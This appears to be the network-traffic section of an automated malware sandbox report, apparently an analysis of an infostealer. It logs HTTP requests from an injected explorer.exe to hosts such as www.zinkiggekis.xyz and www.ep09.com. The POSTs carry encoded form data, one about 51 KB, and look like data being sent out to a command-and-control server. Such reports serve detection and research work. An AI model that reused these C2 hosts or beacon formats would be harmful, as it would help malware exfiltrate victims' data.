31 55 38 34 64 55 6c 49 59 55 59 6f 33 4d 45 74 6f 68 28 6c 7e 37 68 33 66 30 36 37 34 56 4d 76 57 51 59 70 45 73 79 58 54 6f 28 69 57 6f 50 70 72 52 6b 39 7a 76 77 53 79 50 73 38 43 31 43 57 65 65 76 75 47 66 63 6e 78 45 6f 4b 68 55 54 45 4c 66 49 52 72 72 55 70 5a 30 55 61 7e 65 74 44 75 4f 6f 52 32 66 36 5a 28 46 7e 75 68 71 7a 2d 79 39 32 71 43 6b 4f 36 65 69 62 74 6a 68 4a 74 43 57 31 66 61 58 57 48 6d 46 46 45 4f 35 41 69 55 4c 4b 6f 53 30 76 4b 49 50 41 63 6c 4c 5a 37 33 54 6b 39 51 6d 76 44 57 46 69 31 41 62 61 39 59 43 55 77 64 31 49 46 62 62 53 51 68 71 28 43 6c 4e 78 31 68 64 58 6d 52 71 73 7a 78 66 4b 43 49 53 38 58 6c 6f 47 53 74 31 46 34 28 72 77 64 36 6e 77 68 46 43 39 32 6d 5f 50 38 66 4c 44 65 57 53 71 49 43 30 6e 34 45 4c 56 76 63 38 49 34 67 36 52 36 61 76 43 6a 48 51 42 44 42 7a 7e 43 65 5f 79 36 30 69 33 4c 6c 6b 4f 68 4f 34 53 63 36 64 44 38 77 45 34 30 6d 6f 66 62 43 58 75 50 57 35 5a 42 6f 48 4e 69 44 50 53 55 64 4e 38 34 4f 59 34 66 4e 77 4e 33 37 46 4c 59 5a 4a 71 5f 61 30 51 64 32 64 32 4b 49 4e 37 65 6a 36 63 48 53 4c 73 6d 74 49 6a 42 74 67 7a 6c 65 50 65 73 6a 71 57 56 41 36 5a 63 56 4e 76 44 72
                                                                                                                    Data Ascii: O0qEM=Z5szetemHV1FeOMfNiee~Qa6pj0s~OoIHiHBfkAcxr5qvjcb4_~LdVY3Pc8H5NAp(xdcGKTvBykK2PJY(HQiyIcx72QXoJEPkfPldBkUhpwXFQ~dO60U5OXg0jgJXCQ1UK(J1Fsvzo7t8xagokZj(VsIcZM0pxcGrczigIABl7RzfNd7F90rUWpWZed6~Yu7VmrNgTjxqLRJoCWFk7NGJ_7z4q8FAZAHsgyNej4JGA3sL81sAYZV5sXQ1rbA3zDi4msIt_qTGRBSkA~2Yvh9xmC0t-1-1vLPRnU2suoT0FaoIk3X0hYBS_Tqo4swyv5C2a9KdiN9MqbHSfVhGkq6igNSXblzGemP1m0GucYQYXZNyFlxnLLL2BVYoU3H(Y4YwzlfmrOWh2MqVnhpPCB_NHMwCM1fOeC0fXa0Rlav10XCIXnAaHWSJbzYO_ppGJwwkCK2c3dIB2a68qLHU4wYFmB5zLQNB2E_qI7SCgCq~_wjFZv9YO~G5oLdZHDU(0NweOKjIBU0s6qaH15ZX7tZPX2ungD8ZmDgE-2TcNVq(wPJpvvv0X9BwW5sZ7sx4_nV1JLvdvqlIseT4dYDpe3qQCQ5r8gUc0odBBtuI16DEVu9N5jqDu2zgw5nHZDkNLmuc6SbeKq-sxrb40JtN6b1NNDaMNIa5TJMf-ZqLLXlrjDqedx-~XSVf4jN2n5vnZssE7AlCQw4DjL_h4hwkSRyz1m8AfD14DVVgB42Ekv7ehRPvu41F_TkYeQN7dnodfXTXEFWBl45l4zytV2kA-xZIDzgB3V_2L5rzMdhXNzIS3Uwqx0T3-hEh7BIKdaJ7BOEgkdGn2~3P-DVaYCtTkhqjp63cFwc(TpaGhYuVEvYMvDqCMDNDLjxm_(DSflwa0ylLxLM7euEXb(9eOOQHq1Ctyh2ncjV84MkFjzA0wYa752gSNfV1Kh80HNHEDLBtlkCAotz4t3XXgUBr2Yn1U84dUlIYUYo3MEtoh(l~7h3f0674VMvWQYpEsyXTo(iWoPprRk9zvwSyPs8C1CWeevuGfcnxEoKhUTELfIRrrUpZ0Ua~etDuOoR2f6Z(F~uhqz-y92qCkO6eibtjhJtCW1faXWHmFFEO5AiULKoS0vKIPAclLZ73Tk9QmvDWFi1Aba9YCUwd1IFbbSQhq(ClNx1hdXmRqszxfKCIS8XloGSt1F4(rwd6nwhFC92m_P8fLDeWSqIC0n4ELVvc8I4g6R6avCjHQBDBz~Ce_y60i3LlkOhO4Sc6dD8wE40mofbCXuPW5ZBoHNiDPSUdN84OY4fNwN37FLYZJq_a0Qd2d2KIN7ej6cHSLsmtIjBtgzlePesjqWVA6ZcVNvDrPXZG4RVCltA0upt(NWp(QtsNQDNpKkvn6kIi4hZkO~-tYR9nHux31cPg_h76dOhbvT-7ApuhhlnsuTJor1pbrGa6Dx1yBXCvxlg8U781HZ2moHmfGwCizRLEq9l9j8sgGABTDqhTCAFmECvDYBIHnBOQlwP9pYfuueJJFOmJYyL9GQLdmawCy9BS6vekb4TV0J7pZ1ZgIDEtX~LFqg5coQ_bTUqRcw-esz1jvfdNIFu3ty9zgKqujtX1Z7eat68Bjpb4RFPW13ay1AUQh1Tpenyae~SXyjdyu0AvDD1Ej58eFTuVTUWUO0wEmBCB_fgxrKV7EYC9cIb79iWbDOTGzPmMyJOKAw9mOZmqUzscIU9SMAzxNCJ09RCxzDoHHuQcIfHeTCOLiSxnQNfC58HNIB64nvc4g1mAxbF5Xdgung2bpO5IKyhdiwgnGgWMwztqmmULmjYlMvoQt7_8nK78LvdqoVVw63Qa3putzENtp(DBdyPtLTX8KakLQlLP3I_f8LUk1ANQO3FD2PjIlqiwdAkQAFh7yMsfRLlTKIDNubYhO7VXxDysAztReZktv4kt9BvXh1fEB6gCzri8TjjemqO114TyZYVOYDcRfj_jKjiP0ve1vgbfljPuBW47CLDqyoXztVIHzZv6IvL(EpiVDYSGkLCtK2GeoCx8Vifp6bHR2WF7kSxWE6CdfoVeJwgT911Cg(h(I5pW0RPnCF6KU~Vt5ekRAaDfoAsyttwL0ts9XbRwHSgnRi64hlOOnpPXy8eow56JS8arQmlYD~9myNkXWlKgszXq6FNrKQyan(9qEnqG_9jFrNmgyAM8LLSfd(ZSjBML7e_Thkdbk1NBmbTEnkKMTUSeeflQlzBM3wTdPP9Z6DT(r2FOvW04y01GC~hqXjRwlI5ecluap3cklD00rCZku(PHbHCTbxjN_qHw5JCHOMQukfzCCYi8u(F8Ph23b5QeeF5sH7EcFZ9gi5C91iCpg9dU-WpD0X_72kmj1rhJjBpJ1gD~XFqR8F7yRUT2m5NQV9sDnuzaW0byKghepLhTlw7tXjTtcytezOnGFEInrs_uPkvnQ8mGUVk2WPJY7SFppNM6m50bIjwE_J0uVnb4pihhXlrkAmRzXrVSshIag5EGmnbZmSK1erNcVHjGjF_ruZs1lB16L34cRyFV2co(WKZGp7mZg4wFUljvhAUJrqs(x6Gb3tITXcqaKNpSdhdNmBFBUyShkoS6brUpF5ifkZMXsKrW20KgbVC0U5VFHwcnKapuJe7vIAsjMAeHzZm9IdSiK(D7TE7r5N01QvsK4s1gHvmQ-KpnsO_bxvECyVrMTZfRi9pTxF8CftQ8k96evAWeRnF(LNL4lzo134SzGw1PK7N3naXB3D68UnmVNfYm_TGbBRCo_ozHFzLBH2_cjSXFEDbEQOUPldQkdfpX4qly4n9U4BJze63NKVJ6k5YQ6h4pPI5x_xY~tAivZOBTTnyNvqrO1c7dhy8zIFgiIueQKBrvk9B~OuORr5oHRT66BxnVumhKdx9zUi3b0E4G3U0II5aHarC7E5RAcjkrtu5jl0wJSyqAQNbWNqGw3kL8oOYg3DkLMeU2ULDMpd7GCcrBmZCwkkR9dZVSR7BmHHhjpUxF_a5rN9TqVDmcfjxCqKHBNoOjOwKyC9cfWSH3WJIhBAVKBKpLox1KMOhsOxh3TlXcqjb3EgTs_U0qchZhRgVa6yuQcsQgiZKH4Y0HN7Sh5SI(gSWjL5EqGd5YAJ0duO7tNw9EREnkFUkDCozYhoayDkZYoc8AGUY7PjkCQLADq(XD-3cd9nrAgjXKrUTG-kwKdi_kFvHtCtBAsn0KP1idfm3nf8-HSG8brosXcyEXNobT_gWEZYITT~sv-Uch0pZIxnq~jNlr7QoxDiPQRBA8CoxrNY5cuyILTIY0IbRT4JIlD7Y4jMqtnmb0rgN7Ve6vaYhhMZmS9xYYX147E3JjKdwhc8_jgt8SCkaKhF17iYHUxakf4TOkx9DqPr11TNDwrdwhIPWx4CFFirQDVpztu~ri0qc6c9jXAser-yrRMOK6fEw0nwTSVWmgWhFoDG9w_RhbTlBAvi5CCpbuFVVR6~hobYDcx(BMYsMX8CkV-5s2ewSPbwiSoMYqmEIFJRLKyRhN5N7m9gLyuensdSSbWVmk6MUCMRXtBK_~Ett1iAmxiYbLgog0riVN_4BqyHLayZ9I9IIKhOntQWd~1xGJh(oF98MNbReJGSlxYPZtUCC~Ful~UIGW9i0iSxbOvaOAJPQ24EsHIzI6KpXFttaYFPFsFHcCAJA3wFjweQsSi3o5mmLfVqJC2BggXA1f76WbVAzAtakO445Tc2kdP6Cw6D1enzK2y1bmGQIFHb0cU7nKOKpDPGeHzlPp9wv5FoNEWRE(jmM61UTcOjERCg9k9EYcJ7UBCvP0QYJpWpZc0Xqu3ink-Z6ZhXqEnBvuo8fNzMRYwaTNpcCUlGGvgJcfycSpgqcGZJjxDi1fDzh5D9apXYROShtLIz9UffGb5WsKt7Mynk2FIOXcoXNN-o4ebSRcTpqOICGgQAJD3i7nfMRgLp9Aakchlca7g4Cp95uE2jAaXI0HxGB74QcugYY0Q0lA0BOoZb_oeMrISlopDsKbv42PzuJ8I9qCcUN7NXAXb4sQ5erQRKJ2zumtgTPyr7p3igTlupWlhP5tlQt9ZL8dfCgE9yM9SiZlfOsyTJS
                                                                                                                    May 30, 2023 11:10:55.781106949 CEST1078OUTData Raw: 6d 71 63 4d 69 68 72 4a 75 6e 4b 52 4d 68 6a 36 49 6b 45 45 73 67 35 4d 39 44 32 61 4c 78 51 50 6e 33 71 76 39 67 39 6b 34 43 64 48 56 7a 75 75 47 6b 76 71 63 6b 7e 77 78 6e 4c 59 65 76 57 6c 6c 73 42 68 37 76 42 43 6d 71 45 50 51 32 59 4e 43 35
                                                                                                                    Data Ascii: mqcMihrJunKRMhj6IkEEsg5M9D2aLxQPn3qv9g9k4CdHVzuuGkvqck~wxnLYevWllsBh7vBCmqEPQ2YNC5T_8ThjlM4kj4T5w8JIWfcejd~zVMbT8xUDU3hpm2CAm2RK070e~roaiY6mxNPpbVZVYG2EH9~Go7tEsYwoirllIqKy~Qk0hZQJaljRVidtXr3UUbmO2pwH6hxyTDuTikwWYTH5shGfEH~Pxzx6C7qAfMfwkEQDndi
                                                                                                                    May 30, 2023 11:10:55.781219006 CEST1083OUTData Raw: 74 54 38 44 76 37 48 48 47 34 7e 70 71 37 30 6d 71 46 65 2d 56 6b 75 73 72 2d 74 58 44 74 4c 4b 64 69 77 7a 5a 4d 4d 52 57 70 74 43 62 61 66 61 57 30 31 38 33 77 61 32 43 4c 50 69 79 73 4f 34 48 6b 53 32 42 77 33 6d 44 7a 39 58 52 47 38 57 63 6a
                                                                                                                    Data Ascii: tT8Dv7HHG4~pq70mqFe-Vkusr-tXDtLKdiwzZMMRWptCbafaW0183wa2CLPiysO4HkS2Bw3mDz9XRG8WcjOIIZVUuBHxRiZjXMzxXNiZf3e7fdDS1oj6GnveZWdNgorqT6prI5~NOpkWNJf5r3mDXYNVIipxehrQctVaRGhlmTCBv_mEArkD08T1vl1_13mm2Il7uHgEkcf65BF2X_M8BI7_R4ra3HDnVPDa4_gPpcodDpZ2xhW
                                                                                                                    May 30, 2023 11:10:55.781270981 CEST1084OUTData Raw: 70 4b 62 7a 46 55 50 5a 54 53 64 33 38 4a 38 32 6b 6f 55 41 6a 56 49 73 69 5f 55 71 42 35 64 58 50 6c 35 79 4e 64 5a 6d 54 7a 74 49 4d 34 41 4b 34 30 36 72 39 51 46 70 69 41 48 4a 30 47 58 65 32 34 71 66 54 77 68 79 42 7a 32 46 6f 37 46 43 4d 69
                                                                                                                    Data Ascii: pKbzFUPZTSd38J82koUAjVIsi_UqB5dXPl5yNdZmTztIM4AK406r9QFpiAHJ0GXe24qfTwhyBz2Fo7FCMi6Qa_YV1Lbr9j60w7K2S4mZzQQHGSklU1N8SzIcMZbhWac3IcoTkF(0d1ne4hpi2s03yeiXqobYjKHmjZ1EnCivnB9rNLXIcrUxKUXj0k(F2GOrkI1zHgpDjFLvqzboUOABs9uGC-hyTh8jKMfS8PW8~IAIKw02P_Z
                                                                                                                    May 30, 2023 11:10:55.781488895 CEST1086OUTData Raw: 65 6f 69 7a 68 6f 70 62 56 5a 64 53 6c 42 71 49 59 4f 61 4f 75 45 37 76 43 62 54 74 76 66 71 78 55 48 4b 5f 6a 59 62 69 78 4a 71 6d 65 5a 46 63 32 41 52 52 78 36 63 53 4d 34 5a 72 6c 46 31 32 70 63 37 6a 28 4d 73 53 39 6e 36 4d 64 6b 63 39 37 5a
                                                                                                                    Data Ascii: eoizhopbVZdSlBqIYOaOuE7vCbTtvfqxUHK_jYbixJqmeZFc2ARRx6cSM4ZrlF12pc7j(MsS9n6Mdkc97ZEbOc6f4AJz3PsqKeaMg48BadGnTYUeEBX-GqNo(rQ0h193z_8ZqKmALCPgFRNRaAG-nagkxNXI(MDt7PRgOsqpF5DV45DDVlUTllC8s4fBTr(iyQyqhpJMzGgB0SEKnHRv5ECaEFeni4jd2V17oVos2LeQduLn~w3
                                                                                                                    May 30, 2023 11:10:55.781670094 CEST1094OUTData Raw: 4e 35 47 4e 66 4d 39 53 4a 43 28 56 78 52 38 30 44 52 6d 65 41 31 62 77 34 65 63 73 41 69 6c 57 64 6d 36 4b 63 2d 36 77 6b 4f 79 77 31 55 56 4f 61 46 4c 4b 47 4b 78 47 53 4f 4e 55 38 38 63 46 51 50 6a 4e 53 62 36 56 56 6e 56 63 30 59 59 5f 75 67
                                                                                                                    Data Ascii: N5GNfM9SJC(VxR80DRmeA1bw4ecsAilWdm6Kc-6wkOyw1UVOaFLKGKxGSONU88cFQPjNSb6VVnVc0YY_ugWFfWds9-ikODhVkYDKbB4eWiHzJhfWZ0DIxvqM~Ku22yEovSLMaqq48RYZDEsyAf5yyoNEjfnvNwPMPTumQPqCihXVJjS07gxASvYFghRGi2lYAZhAXdy828MYKcsUiHSlZKvCftYNlUdNKVdUrazflVp3Zb4-OF9
                                                                                                                    May 30, 2023 11:10:55.781784058 CEST1096OUTData Raw: 34 5a 6a 77 74 6f 58 76 52 52 79 76 44 6f 39 2d 75 46 63 4e 4d 59 69 35 6c 37 42 44 57 77 7a 72 53 7a 36 43 6b 53 6c 71 4b 4a 6e 47 45 59 65 4c 5a 69 45 4a 6e 6b 32 59 39 4d 44 65 45 74 34 35 4c 78 79 66 64 74 67 66 70 54 61 37 39 37 46 52 39 4c
                                                                                                                    Data Ascii: 4ZjwtoXvRRyvDo9-uFcNMYi5l7BDWwzrSz6CkSlqKJnGEYeLZiEJnk2Y9MDeEt45LxyfdtgfpTa797FR9L9In_Y8Kg9MiMULEZtWBnutYGF1uKb2LcNhaSmciFui6SBweCtxNWNtd1qDeGHE3DTgn6dy5_5nL61uYurzm4dOTKxB98bva9MjEz0mPaCQWw0HIW~JJ_ZFdTZ_~4MF0jaVKkY39pvgDh(Gbkas1XBR3uZ3IojfEEQ
                                                                                                                    May 30, 2023 11:10:56.027920008 CEST1105OUTData Raw: 43 52 6c 63 53 72 58 72 39 44 63 67 53 58 46 61 4b 4e 4b 4d 47 47 4f 4a 66 4d 67 66 70 6e 63 6d 46 43 67 64 35 61 31 36 44 62 4b 4e 47 6c 52 4d 6d 52 44 79 43 52 45 48 46 4a 62 6f 77 51 57 64 4f 77 66 6a 6d 4b 4c 6b 37 59 6d 6b 59 33 67 42 76 77
                                                                                                                    Data Ascii: CRlcSrXr9DcgSXFaKNKMGGOJfMgfpncmFCgd5a16DbKNGlRMmRDyCREHFJbowQWdOwfjmKLk7YmkY3gBvwn3tTAxAbsmdU~MPtLNujgiC2L6fuPgSOiHNwaDWIjDKXW2ceFOsVuu2RaAq06QjUZ0sOqHzD8W44W2VkbZPyjt2pZjgEVfwLYGsj7NzKoWmRjFDeaDh7V25NHT1hR_0liUf_tUHefQSEx6o1uemgb8r4MsMXkRwcu
                                                                                                                    May 30, 2023 11:10:56.028039932 CEST1109OUTData Raw: 56 4d 37 49 4c 66 73 36 34 64 6e 52 57 4e 59 54 53 34 66 41 41 41 6c 39 4e 64 6d 67 30 45 41 63 79 6a 49 38 51 33 30 61 47 6b 72 63 6f 6a 56 74 30 6e 6b 75 65 54 4d 48 6e 67 57 39 7e 58 4c 53 4e 52 34 6a 51 57 79 69 4b 4a 78 54 65 51 30 6a 4f 42
                                                                                                                    Data Ascii: VM7ILfs64dnRWNYTS4fAAAl9Ndmg0EAcyjI8Q30aGkrcojVt0nkueTMHngW9~XLSNR4jQWyiKJxTeQ0jOBPOxIDM6pvVpRIXhRapBEu3gDFzkRMxRweqxbNKF3i-qwaTxNrm0SWt57RIHbvuWSLkD4gbO3XSr-i58Gn3SxsChl6kgW87H8slQf~EH-mzNL1UJP0m8wGN(K~nJnDYWxXiu6tw7Qftngv2w8(wQt0dJPvEG0QT7FT
                                                                                                                    May 30, 2023 11:10:56.353753090 CEST1110INHTTP/1.1 400 Bad Request
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:10:56 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    54192.168.11.2049813154.84.88.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:58.323972940 CEST1110OUTGET /tchg/?O0qEM=U7ETdamdP1ZCKOUjEiyRlibAgxYlwKZeBR7oaxwm2PdxgC4EyvOHYU8IW8pd/NQOhWFEBZrGHEgN3MxkyARqzohq8TIPp6MjlQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.ep09.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:10:58.579340935 CEST1111INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:10:58 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 1.0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    55192.168.11.2049814109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:03.683324099 CEST1112OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.zinkiggekis.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.zinkiggekis.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.zinkiggekis.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 72 42 73 39 72 38 72 36 4f 39 48 30 67 4c 35 76 6d 74 49 70 62 37 79 51 69 72 61 49 65 34 41 2d 35 4e 75 49 66 6c 77 37 4a 41 32 75 52 57 4d 42 37 55 34 70 41 49 43 5a 4b 46 72 5a 41 49 70 37 46 65 54 75 48 32 4b 63 69 39 4c 63 32 33 4f 4c 35 43 65 68 62 4f 77 5a 75 68 58 42 41 57 69 30 55 77 57 2d 38 67 37 46 58 57 7e 51 6d 5f 52 4c 31 52 71 52 7a 41 30 66 45 66 42 32 6e 56 77 33 58 61 31 58 6f 53 70 47 43 71 4a 77 63 66 38 52 35 5f 6d 4c 57 64 44 59 65 2d 45 64 66 6a 4d 2d 37 48 7e 2d 45 79 30 46 78 77 6f 65 6c 52 6c 37 78 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=rBs9r8r6O9H0gL5vmtIpb7yQiraIe4A-5NuIflw7JA2uRWMB7U4pAICZKFrZAIp7FeTuH2Kci9Lc23OL5CehbOwZuhXBAWi0UwW-8g7FXW~Qm_RL1RqRzA0fEfB2nVw3Xa1XoSpGCqJwcf8R5_mLWdDYe-EdfjM-7H~-Ey0FxwoelRl7xQ).
                                                                                                                    May 30, 2023 11:11:03.765714884 CEST1112INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    56192.168.11.2049815109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:06.295417070 CEST1114OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.zinkiggekis.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.zinkiggekis.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.zinkiggekis.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 72 42 73 39 72 38 72 36 4f 39 48 30 68 72 4a 76 6b 4b 30 70 4b 4c 79 50 6f 4c 61 49 51 59 41 45 35 4b 6d 49 66 68 49 53 4b 7a 65 75 52 33 38 42 70 42 55 70 48 49 43 5a 42 6c 72 63 4f 6f 70 73 46 65 58 6d 48 7a 69 63 69 35 62 63 32 43 61 4c 77 53 65 6d 54 75 77 61 6d 42 58 63 54 47 6a 35 55 77 4b 45 38 6b 6e 46 55 6d 53 51 6c 35 39 4c 6b 30 66 48 33 67 30 5a 47 66 42 31 74 31 77 70 58 61 35 75 6f 53 67 78 42 5a 56 77 64 5f 63 52 34 5f 6d 4b 65 74 43 78 52 65 46 54 5a 54 39 42 30 31 32 75 46 42 74 31 77 45 63 41 74 67 38 45 73 5a 53 4f 4e 72 37 50 4c 79 5a 56 31 43 75 74 30 63 57 47 4c 59 56 39 31 41 6c 46 4b 32 55 56 39 76 6f 71 76 67 32 4a 4e 75 52 64 45 41 42 73 28 51 38 76 75 4a 71 4f 4f 56 68 5a 32 62 6a 5f 34 39 62 5f 79 35 32 49 52 6b 6a 38 73 42 6d 56 33 35 57 4f 63 68 53 74 61 37 50 64 43 73 41 6e 37 31 39 4e 59 4b 36 31 54 53 28 59 46 70 58 65 32 6b 6a 6e 79 34 62 2d 72 2d 79 72 37 4a 41 35 65 6c 54 34 72 50 35 66 37 6e 37 4b 51 50 7a 54 64 41 41 7a 44 5f 5a 5a 44 58 68 41 7e 32 53 55 72 46 38 51 46 5f 52 7a 65 53 48 41 77 37 56 79 52 33 6b 72 36 31 53 75 47 64 71 30 62 4a 33 37 75 72 6d 4c 35 50 34 52 46 33 6b 34 54 31 31 58 4f 75 37 73 54 62 56 33 62 55 34 4b 62 77 4d 58 34 46 31 46 75 44 32 4c 7a 35 76 30 42 6b 67 63 38 42 41 68 7e 42 63 53 42 61 7e 36 46 71 45 43 58 49 6c 51 73 41 70 4a 59 37 28 4b 59 77 68 42 54 62 6f 6a 39 77 62 58 33 41 4e 49 61 5f 73 67 70 31 52 4f 31 31 52 6e 67 62 5a 57 37 42 45 6b 38 66 68 4c 47 52 28 78 5a 69 48 4a 6e 4f 37 52 42 57 46 76 4c 50 68 64 4d 54 44 34 4f 56 48 42 30 52 61 4d 6c 6f 51 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=rBs9r8r6O9H0hrJvkK0pKLyPoLaIQYAE5KmIfhISKzeuR38BpBUpHICZBlrcOopsFeXmHzici5bc2CaLwSemTuwamBXcTGj5UwKE8knFUmSQl59Lk0fH3g0ZGfB1t1wpXa5uoSgxBZVwd_cR4_mKetCxReFTZT9B012uFBt1wEcAtg8EsZSONr7PLyZV1Cut0cWGLYV91AlFK2UV9voqvg2JNuRdEABs(Q8vuJqOOVhZ2bj_49b_y52IRkj8sBmV35WOchSta7PdCsAn719NYK61TS(YFpXe2kjny4b-r-yr7JA5elT4rP5f7n7KQPzTdAAzD_ZZDXhA~2SUrF8QF_RzeSHAw7VyR3kr61SuGdq0bJ37urmL5P4RF3k4T11XOu7sTbV3bU4KbwMX4F1FuD2Lz5v0Bkgc8BAh~BcSBa~6FqECXIlQsApJY7(KYwhBTboj9wbX3ANIa_sgp1RO11RngbZW7BEk8fhLGR(xZiHJnO7RBWFvLPhdMTD4OVHB0RaMloQ.
                                                                                                                    May 30, 2023 11:11:06.376081944 CEST1114INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:06 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    57192.168.11.2049816109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:08.902991056 CEST1127OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.zinkiggekis.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.zinkiggekis.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.zinkiggekis.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 72 42 73 39 72 38 72 36 4f 39 48 30 68 72 4a 76 6b 4b 30 70 4b 4c 79 50 6f 4c 61 49 51 59 41 45 35 4b 6d 49 66 68 49 53 4b 31 47 75 57 46 30 42 37 32 67 70 47 49 43 5a 4d 46 72 64 4f 6f 70 78 46 61 7a 69 48 7a 75 6d 69 37 54 63 32 54 4b 4c 77 67 32 6d 55 75 77 68 6c 42 58 43 41 57 6a 74 55 77 57 59 38 6c 57 6e 58 57 57 51 6d 2d 42 4c 31 7a 43 52 71 41 30 66 47 66 42 70 70 31 77 62 58 61 4e 2d 6f 54 63 78 42 62 68 77 64 4e 6b 52 30 4d 65 4b 54 64 44 44 59 2d 46 49 51 7a 38 37 30 78 65 41 46 42 73 41 77 41 45 41 74 67 63 45 74 59 53 4a 4e 4c 37 50 56 69 5a 57 6d 53 69 78 30 63 69 65 4c 5a 68 39 31 44 6c 46 4c 57 55 56 34 4c 30 6c 70 41 33 4d 62 65 51 46 41 41 4e 6b 28 55 55 52 75 49 7e 4f 4f 6d 64 5a 6e 35 4c 5f 36 66 7a 5f 74 70 32 4f 56 6b 6a 76 6d 68 6d 7a 33 35 47 30 63 67 79 39 61 38 58 64 43 4e 67 6e 74 41 4a 4f 4b 71 36 7a 63 79 28 42 4f 4a 72 43 32 6b 53 6d 79 34 62 55 72 39 7e 72 37 59 51 35 66 6b 54 37 7e 66 35 63 75 33 37 62 5a 76 28 5a 64 41 63 72 44 5f 42 4a 44 55 4e 41 6b 57 53 55 75 6d 6b 50 4e 50 51 35 43 69 48 53 30 37 56 62 52 33 6f 5a 36 33 7e 68 48 73 32 30 64 35 6e 37 28 